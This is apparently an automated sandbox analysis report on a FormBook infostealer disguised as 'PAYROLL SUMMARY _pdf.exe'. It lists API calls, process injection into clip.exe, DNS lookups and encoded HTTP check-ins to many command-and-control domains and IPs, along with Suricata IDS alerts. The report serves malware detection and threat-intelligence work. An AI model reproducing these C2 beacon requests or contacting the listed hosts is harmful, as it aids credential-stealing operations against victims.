Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000002.2332101149.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300928384.000000000301A000.00000004.00000020.00020000.00000000.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4602736718.0000000001088000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_002B4696
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BC93C FindFirstFileW,FindClose,	0_2_002BC93C
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_002BC9C7
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF200
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_002BF35D
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BF65E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3A2B
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_002B3D4E
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_002BBF27
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005ABC20 FindFirstFileW,FindNextFileW,FindClose,	4_2_005ABC20

Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then xor eax, eax		4_2_00599870
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_0461053E

Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 23.251.54.212 23.251.54.212
Source: Joe Sandbox View	IP Address: 213.145.228.16 213.145.228.16

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002C25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_002C25E2

Source: global traffic	HTTP traffic detected: GET /w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qe66/?_Z1XhZu=dnvLceXALBk3Hr4/PEp98EYmblYqw8i+NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv+wKPhcHxQ8Rf4DwBflmJ1M/5T4ZVijf5rQCTFvH5w/RX8EiUu+U=&f6Gp=VzB4OR5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xzzi/?f6Gp=VzB4OR5&_Z1XhZu=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T7lrCl4emV2JC4YHgME2JKEwuO5dogcNSV3iaYHGGhbnU2ZhAGg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rm91/?f6Gp=VzB4OR5&_Z1XhZu=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH/0swiWusA81psiewdkdfDrQ0sPpSZKio/bNAkJ8aUrwxHfI1oA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4hda/?_Z1XhZu=+FYRabRorC7iiipcHmFJARkvcpdCy5kXHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9/cDU9mAi5AO1k3J2CN+QyvLAoTep+eWpcszcsTCcamkkP6oiBRs=&f6Gp=VzB4OR5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /li0t/?f6Gp=VzB4OR5&_Z1XhZu=cVY/NretpRV3pSqbAwFMzZODfIM0+2Z9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfmgzsT+t0YhwbvSsCvQsvRzAE2jG1Yfj5GMuV7i/imjBO2IoEoB4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ei85/?_Z1XhZu=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmR9pLGqH3EvMjHhfUWkhMRoKhXKvOJM+sAfODt1eiuBVWJfBsEk=&f6Gp=VzB4OR5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aroo/?f6Gp=VzB4OR5&_Z1XhZu=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGG3kGwJkz3gG7EkbGSmwaxQucCWgWcruhZkgDOmNZxE+MWhMf5t0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tf44/?_Z1XhZu=zHiAY6EG+HxIxFu8Foth356DlimOdN8M+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciyxeruC6VSAZ3gbjbhtXBfFULxOBNiYF/KhRcXzdCdYnjqXRzee6k=&f6Gp=VzB4OR5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mooq/?f6Gp=VzB4OR5&_Z1XhZu=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmsErbGh+kSxw/T3vF3DtlH4gUPM1PULOdKyAjMPLmXyfHmQWdLU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.helpers-lion.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lfkn/?_Z1XhZu=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Cuco6m6gy32+9+fxoWaIs9y0g2xUERgGBbxDKDcI36aN6mbjHo=&f6Gp=VzB4OR5 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.hprlz.cz
Source: global traffic	DNS traffic detected: DNS query: www.catherineviskadi.com
Source: global traffic	DNS traffic detected: DNS query: www.hatercoin.online
Source: global traffic	DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic	DNS traffic detected: DNS query: www.bfiworkerscomp.com
Source: global traffic	DNS traffic detected: DNS query: www.tinmapco.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS traffic detected: DNS query: www.anuts.top
Source: global traffic	DNS traffic detected: DNS query: www.telwisey.info
Source: global traffic	DNS traffic detected: DNS query: www.sandranoll.com
Source: global traffic	DNS traffic detected: DNS query: www.gipsytroya.com
Source: global traffic	DNS traffic detected: DNS query: www.helpers-lion.online
Source: global traffic	DNS traffic detected: DNS query: www.dmtxwuatbz.cc

Source: unknown

HTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 212Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 5f 5a 31 58 68 5a 75 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 48 4a 70 45 76 54 57 51 51 59 49 48 76 48 7a 58 38 62 36 5a 43 54 50 64 2f 70 31 59 55 44 37 47 72 6a 68 2b 6d 43 65 31 2b 65 56 Data Ascii: _Z1XhZu=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7HJpEvTWQQYIHvHzX8b6ZCTPd/p1YUD7Grjh+mCe1+eV

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49755 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49729 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49754 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49741 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49745 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49737 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49752 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49724 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49744 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49735 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49733 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49756 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49730 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49718 -> 5.44.111.162:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49739 -> 194.9.94.85:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49750 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49764 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49758 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49757 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 43.252.167.188:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49720 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49760 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49749 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49762 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49751 -> 213.145.228.16:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49759 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 23.251.54.212:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49748 -> 199.192.19.19:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49763 -> 172.67.210.102:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49721 -> 217.160.0.106:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49753 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49765 -> 172.67.210.102:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 09 Aug 2024 06:40:52 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 09 Aug 2024 06:40:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 09 Aug 2024 06:40:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R\|V}cplxXU*!6pBNI+MteRFSYj[7\|QqY3k\|G;,^{NPPouvw2O7.e(O~Nt^,G\|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
